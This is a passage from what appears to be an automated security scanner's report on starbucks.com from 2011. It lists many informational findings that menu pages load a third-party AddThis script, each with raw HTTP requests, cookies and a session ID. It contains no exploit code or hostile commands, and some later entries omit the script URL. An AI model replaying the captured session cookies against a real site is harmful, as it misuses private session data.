GET /menu/food/bakery/starbucks-classic-coffee-cake HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:54:17 GMT
Connection: close
Content-Length: 44204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.227. http://www.starbucks.com/menu/food/bakery/treat-sized-double-chocolate-cookie

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/treat-sized-double-chocolate-cookie

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/food/bakery/treat-sized-double-chocolate-cookie HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:54:24 GMT
Connection: close
Content-Length: 43150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.228. http://www.starbucks.com/menu/food/bakery/treat-sized-peanut-butter-cookie

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/treat-sized-peanut-butter-cookie

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/food/bakery/treat-sized-peanut-butter-cookie HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:54:27 GMT
Connection: close
Content-Length: 43176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.229. http://www.starbucks.com/menu/food/bakery/vanilla-bean-cupcake

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/vanilla-bean-cupcake

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/food/bakery/vanilla-bean-cupcake HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:54:25 GMT
Connection: close
Content-Length: 43804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.230. http://www.starbucks.com/menu/food/bakery/zucchini-walnut-muffin

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/zucchini-walnut-muffin

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/food/bakery/zucchini-walnut-muffin HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:54:42 GMT
Connection: close
Content-Length: 43338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.231. http://www.starbucks.com/menu/food/fruit-and-snack-plates/chicken-and-hummus-snack-plate

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/fruit-and-snack-plates/chicken-and-hummus-snack-plate

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/food/fruit-and-snack-plates/chicken-and-hummus-snack-plate HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:55:07 GMT
Connection: close
Content-Length: 41786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.232. http://www.starbucks.com/menu/food/fruit-and-snack-plates/fruit-and-cheese-plate

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/fruit-and-snack-plates/fruit-and-cheese-plate

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/food/fruit-and-snack-plates/fruit-and-cheese-plate HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:55:20 GMT
Connection: close
Content-Length: 41517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.233. http://www.starbucks.com/menu/food/fruit-and-snack-plates/protein-plate

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/fruit-and-snack-plates/protein-plate

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/food/fruit-and-snack-plates/protein-plate HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:55:21 GMT
Connection: close
Content-Length: 41880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.234. http://www.starbucks.com/menu/food/hot-breakfast/bacon-parmesan-frittata-and-gouda-on-an-artisan-roll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/bacon-parmesan-frittata-and-gouda-on-an-artisan-roll

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/food/hot-breakfast/bacon-parmesan-frittata-and-gouda-on-an-artisan-roll HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:41:45 GMT
Connection: close
Content-Length: 42323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.235. http://www.starbucks.com/menu/food/hot-breakfast/egg-white-spinach-and-feta-wrap

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/egg-white-spinach-and-feta-wrap

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/food/hot-breakfast/egg-white-spinach-and-feta-wrap HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:42:26 GMT
Connection: close
Content-Length: 42853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.236. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-brown-sugar

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/oatmeal-brown-sugar

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/food/hot-breakfast/oatmeal-brown-sugar HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:42:05 GMT
Connection: close
Content-Length: 40891

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.237. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-dried-fruit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/oatmeal-dried-fruit

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/food/hot-breakfast/oatmeal-dried-fruit HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:42:10 GMT
Connection: close
Content-Length: 41120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.238. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-mixed-nuts

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/oatmeal-mixed-nuts

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/food/hot-breakfast/oatmeal-mixed-nuts HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:42:32 GMT
Connection: close
Content-Length: 40964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.239. http://www.starbucks.com/menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:41:32 GMT
Connection: close
Content-Length: 42765

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.240. http://www.starbucks.com/menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:41:29 GMT
Connection: close
Content-Length: 42228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.241. http://www.starbucks.com/menu/food/hot-breakfast/starbucks-perfect-oatmeal

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/starbucks-perfect-oatmeal

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/food/hot-breakfast/starbucks-perfect-oatmeal HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:42:30 GMT
Connection: close
Content-Length: 41654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.242. http://www.starbucks.com/menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:41:16 GMT
Connection: close
Content-Length: 42356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.243. http://www.starbucks.com/menu/food/ice-cream/caramel-macchiato-ice-cream

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/caramel-macchiato-ice-cream

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/ice-cream/caramel-macchiato-ice-cream HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:58:31 GMT
Connection: close
Content-Length: 38715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.244. http://www.starbucks.com/menu/food/ice-cream/coffee-ice-cream

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/coffee-ice-cream

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/ice-cream/coffee-ice-cream HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:00:42 GMT
Connection: close
Content-Length: 38508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.245. http://www.starbucks.com/menu/food/ice-cream/java-chip-frappuccino-ice-cream

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/java-chip-frappuccino-ice-cream

Issue detail

The response dynamically includes the following script from another domain:

Request

